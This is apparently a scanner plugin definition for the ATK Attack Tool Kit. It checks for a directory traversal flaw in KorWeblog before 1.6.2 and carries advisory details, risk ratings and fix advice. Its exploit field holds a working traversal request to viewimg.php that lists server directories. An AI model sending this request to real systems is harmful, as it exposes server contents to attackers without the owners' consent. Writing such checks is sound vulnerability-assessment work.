<plugin_id>278</plugin_id>
<plugin_name>KorWeblog prior 1.6.2 directory listing</plugin_name>
<plugin_family>CGI</plugin_family>
<plugin_created_date>2004/11/28</plugin_created_date>
<plugin_created_name>Marc Ruef</plugin_created_name>
<plugin_created_email>marc dot ruef at computec dot ch</plugin_created_email>
<plugin_created_web>http://www.computec.ch</plugin_created_web>
<plugin_created_company>computec.ch</plugin_created_company>
<plugin_version>1.0</plugin_version>
<plugin_protocol>tcp</plugin_protocol>
<plugin_port>80</plugin_port>
<plugin_procedure_detection>open|send GET /index.php HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *Powered by <A HREF=.*KorWeblog 1.[0-5].#* OR HTTP/#.# 200 *Powered by <A HREF=.*KorWeblog 1.6.[0-2]*</plugin_procedure_detection>
<plugin_procedure_exploit>open|send GET /viewimg.php?path=images.d/face/../../../../../../../&form=Co HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *</plugin_procedure_exploit>
<plugin_detection_accuracy>80</plugin_detection_accuracy>
<plugin_exploit_accuracy>90</plugin_exploit_accuracy>
<plugin_comment>This plugin was written with the ATK Attack Editor.</plugin_comment>
<bug_published_name>Jeremy Bae</bug_published_name>
<bug_published_email>advisory at stgsecurity dot com</bug_published_email>
<bug_published_web>http://www.stgsecurity.com</bug_published_web>
<bug_published_company>STG Security</bug_published_company>
<bug_published_date>2004/11/24</bug_published_date>
<bug_advisory>http://www.securityfocus.com/archive/1/382135</bug_advisory>
<bug_produced_web>http://weblog.kldp.org</bug_produced_web>
<bug_affected>KorWeblog prior 1.6.2</bug_affected>
<bug_not_affected>KorWeblog newer than 1.6.2 and other solutions</bug_not_affected>
<bug_vulnerability_class>Directory Traversal</bug_vulnerability_class>
<bug_description>The remote host is using KorWeblog, a web based log application written in PHP. A vulnerability exists in the remote version of this product which may allow a remote attacker to disclose directory listings. Information disclosures could help the attacker in further attacks.</bug_description>
<bug_solution>The software should be deactivated or de-installed if not necessary. Upgrade to the latest version of KorWeblog, at least to 1.6.2. To make it harder to find the server the daemon could be configured to listen at another port (e.g. 8081). Try to prevent unwanted connection attempts by filtering traffic with firewalling.</bug_solution>
<bug_fixing_time>Approx. 1 hour</bug_fixing_time>
<bug_exploit_availability>Yes</bug_exploit_availability>
<bug_exploit_url>http://www.securityfocus.com/bid/11744/exploit/</bug_exploit_url>
<bug_remote>Yes</bug_remote>
<bug_local>Yes</bug_local>
<bug_severity>Medium</bug_severity>
<bug_popularity>3</bug_popularity>
<bug_simplicity>6</bug_simplicity>
<bug_impact>8</bug_impact>
<bug_risk>5</bug_risk>
<bug_nessus_risk>Medium</bug_nessus_risk>
<bug_check_tool>Nessus is able to do the same check.</bug_check_tool>
<source_securityfocus_bid>11744</source_securityfocus_bid>
<source_nessus_id>15829</source_nessus_id>
<source_literature>Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427</source_literature>
<source_misc>http://kldp.net/tracker/index.php?func=detail&aid=300515&group_id=13&atid=300013</source_misc>

